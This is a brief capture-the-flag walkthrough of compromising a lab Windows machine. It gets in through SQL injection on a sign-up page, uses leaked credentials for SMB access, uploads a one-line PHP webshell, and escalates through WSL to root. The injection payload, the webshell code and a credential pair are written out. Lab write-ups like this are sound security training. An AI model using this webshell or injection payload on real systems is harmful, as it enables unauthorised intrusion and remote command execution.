To begin our exploration of the network, let’s initiate an nmap scan in order to identify all open ports.
Run a gobuster scan to find for hidden directories.
Tried SQLi on the login page but there wasn’t any success. Decided to create an account to look through the system.
After some trial and error exploring the “Change Password” and “Contact Us” page, I decided to try SQL injections on the sign up page.
Use the following payload =
test' or 1=1-- -
And we get access.
We find the tyler account and the password. tyler / 92g!mA8BGjOirkL%OG*&
Let’s try enumerating SMB with the new creds.
We get read and write access to the new site.
Access the share and we can see that the new site is same on port 8808.
We can see the site utilizes the PHP language.
Create a PHP webshell with the following script.
<?php system($_REQUEST['cmd']); ?>
Execute the URL with the webshell commands.
And we get a shell.
We can find the user.txt in the desktop.
While exploring the machine we come across the distro folder with ubuntu inside. This suggests that this machine is running the WSL , Windows sub system for Linux.
Let search for the wsl.exe and bash.exe to confirm.
Once we find the file, lets execute it and we get a linux root shell.
We can look at the bash history to find the admin creds.
We can either login via SMB to get the root.txt or use psexec to spawn a shell.
The root.txt flag is in the desktop.
Leave a Reply